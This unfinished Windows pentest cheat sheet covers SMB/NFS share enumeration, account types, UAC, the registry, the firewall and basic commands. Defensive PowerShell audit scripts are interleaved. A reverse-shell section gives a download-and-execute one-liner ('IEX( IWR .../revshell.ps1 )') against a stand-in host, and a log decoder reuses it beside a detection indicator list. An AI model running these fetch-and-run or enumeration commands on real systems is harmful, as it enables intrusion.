
This article is currently being written.

Windows basic

Pentest Tools

SMB

Enumerate shares and access:

$ crackmapexec smb example.com --shares
$ smbclient -L example.com
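The two commands above show the client-side view of SMB shares. As an added example, not part of the original page, here is the matching server-side audit on a Windows host with the SmbShare module: it lists the non-administrative shares whose share-level permissions give broad groups more than read access. The list of "broad" principals is this example's own choice, and NTFS permissions on the underlying folder still apply on top of the share permissions.

```powershell
# Added example, not from the original page: server-side counterpart of
# "crackmapexec smb --shares" / "smbclient -L". Requires the SmbShare module
# (Windows 8 / Server 2012 and later). The principal list is an assumption.

$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\ANONYMOUS LOGON'
)

function Get-BroadShareAccess {
    # Special = $true marks the built-in ADMIN$, C$ and IPC$ shares; they are
    # skipped here because they are already restricted to administrators.
    foreach ($share in Get-SmbShare | Where-Object { -not $_.Special }) {
        foreach ($ace in Get-SmbShareAccess -Name $share.Name) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.AccountName) { continue }
            [pscustomobject]@{
                Share     = $share.Name
                Path      = $share.Path
                Principal = $ace.AccountName
                Right     = $ace.AccessRight          # Read, Change or Full
                Writable  = ($ace.AccessRight -ne 'Read')
            }
        }
    }
}

# Writable entries first: a share that Everyone can change is the finding that
# matters most, a read-only share for Authenticated Users may be intended.
Get-BroadShareAccess | Sort-Object Writable -Descending | Format-Table -AutoSize
```

The effective access a remote user gets is the more restrictive of the share permission and the NTFS DACL of the folder, so a share that reads as "Everyone: Full" here is only as exposed as the folder's ACL allows; check both before deciding a share is safe.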

NFS

Display the folders exported by the NFS server:

$ showmount -e example.com
$ sudo mount -t nfs example.com:/shared_folder /mnt/folder

Reverse shell

Powershell

HTTP Request

C:\> iwr http://example.com/

C:\> Invoke-WebRequest 'https://example.com/files/backup.zip' -OutFile C:\backup.zip

Run a PowerShell expression

C:\> IEX( IWR http://example.com/revshell.ps1 )

C:\> powershell.exe -EncodedCommand <base64>
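The -EncodedCommand form above is what shows up in process-creation logs when a script is passed on the command line. As an added example, not code from the original page, this PowerShell snippet decodes such a command line the way an analyst reading Security event 4688 or Sysmon event 1 would, and flags decoded commands that fetch and execute remote code. The sample command lines and the indicator list are constructed for the example.

```powershell
# Added example, not from the original page: decode "-EncodedCommand <base64>"
# from logged command lines. PowerShell expects base64 over UTF-16LE text, so
# the same encoding is used to build the constructed samples below.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Script)
    # Used here only to build sample data in the encoding PowerShell expects.
    return [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

# Constructed sample command lines, as a log collector would record them.
$SampleCommandLines = @(
    'powershell.exe -NoProfile -EncodedCommand ' + (ConvertTo-EncodedCommand 'Get-Date'),
    'powershell.exe -w hidden -enc ' + (ConvertTo-EncodedCommand 'IEX (IWR http://example.com/revshell.ps1)'),
    'powershell.exe -ExecutionPolicy Bypass -Command Get-Process'
)

function Get-DecodedCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    # The switch may be abbreviated (-e, -ec, -enc, -EncodedCommand); -match is
    # case-insensitive by default. The lookahead keeps the base64 token whole,
    # and "-ExecutionPolicy" does not match because no whitespace follows "-E".
    if ($CommandLine -match '(^|\s)-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)(?=\s|$)') {
        try {
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3]))
        } catch {
            return $null   # token was not valid base64
        }
    }
    return $null           # no encoded command on this line
}

function Test-RemoteExecution {
    param([Parameter(Mandatory)][string]$Decoded)
    # Constructed indicator list: cmdlets and aliases typical of download-and-run
    # one-liners. Tune it to the environment; Invoke-WebRequest alone is often benign.
    $indicators = 'Invoke-Expression', 'IEX', 'DownloadString', 'DownloadFile',
                  'Invoke-WebRequest', 'IWR', 'FromBase64String', 'Net.WebClient'
    foreach ($i in $indicators) {
        if ($Decoded -match [regex]::Escape($i)) { return $true }
    }
    return $false
}

foreach ($cl in $SampleCommandLines) {
    $decoded = Get-DecodedCommand -CommandLine $cl
    if ($null -eq $decoded) {
        '{0,-11} {1}' -f 'plain', $cl
        continue
    }
    $verdict = if (Test-RemoteExecution -Decoded $decoded) { 'SUSPICIOUS' } else { 'decoded' }
    '{0,-11} {1}' -f $verdict, $decoded
}
```

Decoding alone is the useful part: the encoded form hides the script from a quick glance at the command line, but the log still contains everything needed to read it. Feed real command lines from your collector into Get-DecodedCommand and keep the indicator list short enough that it stays readable.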

User Account Control (UAC)

The User Account Control (UAC) aims to improve the security of Microsoft Windows by limiting application software to standard user privileges until an administrator authorizes an increase or elevation. In this way, only applications trusted by the user may receive administrative privileges, and malware should be kept from compromising the operating system. In other words, a user account may have administrator privileges assigned to it, but applications that the user runs do not inherit those privileges unless they are approved beforehand or the user explicitly authorizes it.

Windows Security alerts in Windows 10

Source Wikipedia.

Types of accounts

Account                 Permissions
Guest                   Can use portable software and cannot change system settings.
Standard                Can use portable software and change system settings that don't affect other users.
Administrator           Complete control over the PC.
System                  Complete control over the PC.
Domain Administrator    Complete control over all the PCs in the domain.

Information gathering

Networks information

IPv4 address, DNS server, network mask, MAC address, ...

C:\> ipconfig /all

Environment variables

Display all the environment variables:

C:\> set
  • APPDATA: Path to the application data directory.
  • TEMP: Path to the temporary directory.
  • PUBLIC: Path to the public directory (all users have READ & WRITE permission).
  • LOGONSERVER: Authentication server.
  • ...

User & group information

Find information about the current user:

C:\> net user %username%
C:\> net user %username% /domain

Find administrator users and groups:

C:\> net localgroup administrators

Manage permissions

Microsoft Management Console (MMC)

You use Microsoft Management Console (MMC) to create, save and open administrative tools, called consoles, which manage the hardware, software, and network components of your Microsoft Windows operating system. MMC runs on all client operating systems that are currently supported.

Source Microsoft.

Launch the MMC panel:

C:\> mmc.exe

Display all available information about Group Policy:

C:\> gpresult /z

Docs about gpresult.

Registry Editor (regedit)

The Windows Registry is a hierarchical database that stores low-level settings for the Microsoft Windows operating system and for applications that opt to use the registry. The kernel, device drivers, services, Security Accounts Manager, and user interfaces can all use the registry. The registry also allows access to counters for profiling system performance.

Source Wikipedia.

Paths for policies in regedit (per-user under HKEY_CURRENT_USER, machine-wide under HKEY_LOCAL_MACHINE):

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_LOCAL_MACHINE\Software\Policies
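The UAC behaviour described earlier is controlled by values under the machine-wide Policies path listed above (the System subkey). As an added example, not code from the original page, this snippet reads those values and reports whether UAC is on and how administrators are prompted. EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop are documented Windows value names; the defaults assumed for missing values and the wording of the findings are this example's own.

```powershell
# Added example, not from the original page: audit UAC settings stored in the
# registry. Reading HKLM needs no elevation; changing these values does.

$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPolicyValue {
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][int]$Default)
    # A missing value means "not configured", which Windows treats as the default.
    $item = Get-ItemProperty -Path $UacKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }
    return [int]$item.$Name
}

function Get-UacStatus {
    # Assumed defaults: UAC on, prompt for consent for non-Windows binaries,
    # prompt on the secure desktop.
    $enableLua = Get-UacPolicyValue -Name 'EnableLUA'                  -Default 1
    $consent   = Get-UacPolicyValue -Name 'ConsentPromptBehaviorAdmin' -Default 5
    $secure    = Get-UacPolicyValue -Name 'PromptOnSecureDesktop'      -Default 1

    $consentText = switch ($consent) {
        0 { 'elevate without prompting' }
        1 { 'prompt for credentials on the secure desktop' }
        2 { 'prompt for consent on the secure desktop' }
        3 { 'prompt for credentials' }
        4 { 'prompt for consent' }
        5 { 'prompt for consent for non-Windows binaries' }
        default { "unknown value $consent" }
    }

    $findings = @()
    if ($enableLua -eq 0) { $findings += 'UAC is off: processes of administrator accounts start with the full token' }
    if ($consent -eq 0)   { $findings += 'administrators elevate silently, so no elevation prompt is ever shown' }
    if ($secure -eq 0)    { $findings += 'prompts are not isolated on the secure desktop, so other processes on the desktop can interact with them' }

    [pscustomobject]@{
        EnableLUA             = $enableLua
        AdminPromptBehavior   = $consentText
        PromptOnSecureDesktop = [bool]$secure
        Findings              = if ($findings.Count -eq 0) { 'none' } else { $findings -join '; ' }
    }
}

Get-UacStatus | Format-List
```

The same values are what Group Policy writes when the "User Account Control: ..." security options are configured, so gpresult /z and this check should agree; a mismatch usually means someone edited the registry directly.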

Windows firewall

Windows Firewall (officially called Windows Defender Firewall in Windows 10) is a firewall component of Microsoft Windows.

Source Wikipedia.

C:\> netsh advfirewall
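netsh advfirewall shows the firewall state as text; the NetSecurity cmdlets return the same information as objects, which is easier to audit from a script. As an added example, not code from the original page, this snippet checks the three profiles against a baseline (every profile on, inbound blocked by default, dropped packets logged) and counts the enabled inbound allow rules. The baseline is this example's own.

```powershell
# Added example, not from the original page: PowerShell counterpart of
# "netsh advfirewall show allprofiles", evaluated against an assumed baseline.

function Get-FirewallFindings {
    $findings = @()
    # Enabled, DefaultInboundAction and LogBlocked are GPO-style enums; comparing
    # them to the value name as a string works because PowerShell converts it.
    foreach ($fwProfile in Get-NetFirewallProfile) {
        if ($fwProfile.Enabled -ne 'True') {
            $findings += '{0}: firewall is off' -f $fwProfile.Name
        }
        if ($fwProfile.DefaultInboundAction -ne 'Block') {
            $findings += '{0}: default inbound action is {1}, expected Block' -f $fwProfile.Name, $fwProfile.DefaultInboundAction
        }
        if ($fwProfile.LogBlocked -ne 'True') {
            $findings += '{0}: dropped packets are not logged, so blocked connection attempts leave no trace' -f $fwProfile.Name
        }
    }
    return $findings
}

# Every enabled inbound allow rule is an exception to the default block and
# deserves a second look once the profile settings are right.
function Get-InboundAllowRuleCount {
    return @(Get-NetFirewallRule -Direction Inbound -Action Allow -Enabled True -ErrorAction SilentlyContinue).Count
}

$findings = Get-FirewallFindings
if ($findings.Count -eq 0) { 'All profiles on, inbound blocked by default, drops logged.' } else { $findings }
'Enabled inbound allow rules: {0}' -f (Get-InboundAllowRuleCount)

# Remediation for the profile findings (not run by this script):
#   Set-NetFirewallProfile -All -Enabled True -DefaultInboundAction Block -LogBlocked True
#   netsh advfirewall set allprofiles state on
```

Run it from an elevated prompt only if you intend to apply the commented remediation; reading the profiles works as a standard user.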

Windows commands

cd

C:\> e:
E:\> d:
D:\> cd Documents
D:\Documents>
  • C: Windows system disk.
  • D: Data storage disk.
  • E: Data storage disk.
  • X: Disk used by Windows PE at boot.

Info

A drive letter is only a label; which letters are used is arbitrary.

dir

dir lists the content of a directory.

mkdir

mkdir creates a directory.

C:\> mkdir <directory>

del

del deletes a file.

C:\> del <filename>

rmdir

rmdir deletes a folder.

C:\> rmdir <folder>

Info

Use the /S argument to remove the folder together with all the files and subfolders within it.

move

C:\> move <src> <dst>

copy

copy only copies files, not the folders within a directory.

C:\> copy <src> <dst>

xcopy

xcopy copies files and the folders within a directory.

C:\> xcopy <src> <dst>

icacls

Displays or modifies discretionary access control lists (DACLs) on specified files, and applies stored DACLs to files in specified directories.
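The DACLs that icacls displays are what decide whether a standard user can replace a file, which is why they matter both for the PUBLIC directory note in the environment-variables section (all users can write there) and for any directory a privileged service loads binaries from. As an added example, not code from the original page, this snippet walks a directory and reports entries that grant write-type rights to broad groups; the principal list and the choice of rights are this example's own. Running it on $env:PUBLIC shows the expected broad write access; running it on a service's install directory shows whether a non-administrator could modify what the service runs.

```powershell
# Added example, not from the original page: find files and folders whose DACL
# grants write, modify, delete or full control to broad groups. Equivalent raw
# view: icacls <path> /t. Needs PowerShell 5 or later for Get-ChildItem -Depth.

$BroadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal change or replace the object. Modify and
# FullControl include Write; Delete alone is enough to swap a file.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::Delete

function Find-BroadWriteAccess {
    param([Parameter(Mandatory)][string]$Path, [int]$Depth = 1)

    $items = @(Get-Item -LiteralPath $Path) +
             @(Get-ChildItem -LiteralPath $Path -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue)

    foreach ($item in $items) {
        $acl = Get-Acl -LiteralPath $item.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { continue }   # no read access to the security descriptor
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($BroadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            # Bitwise test on the integer value: generic-rights ACEs carry bits
            # outside the named enum values, and the cast keeps the test honest.
            if (([int]$ace.FileSystemRights -band [int]$WriteRights) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $item.FullName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Expected to show broad write access: PUBLIC is meant to be shared.
Find-BroadWriteAccess -Path $env:PUBLIC | Format-Table -AutoSize

# Fixing a finding on a directory that should not be writable (not run here):
#   icacls <path> /remove:g "Users"
#   icacls <path> /inheritance:r   (then grant only the intended principals)
```

Inherited entries (Inherited = True) point at the parent directory as the place to fix; removing the right on one file leaves every sibling exposed.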
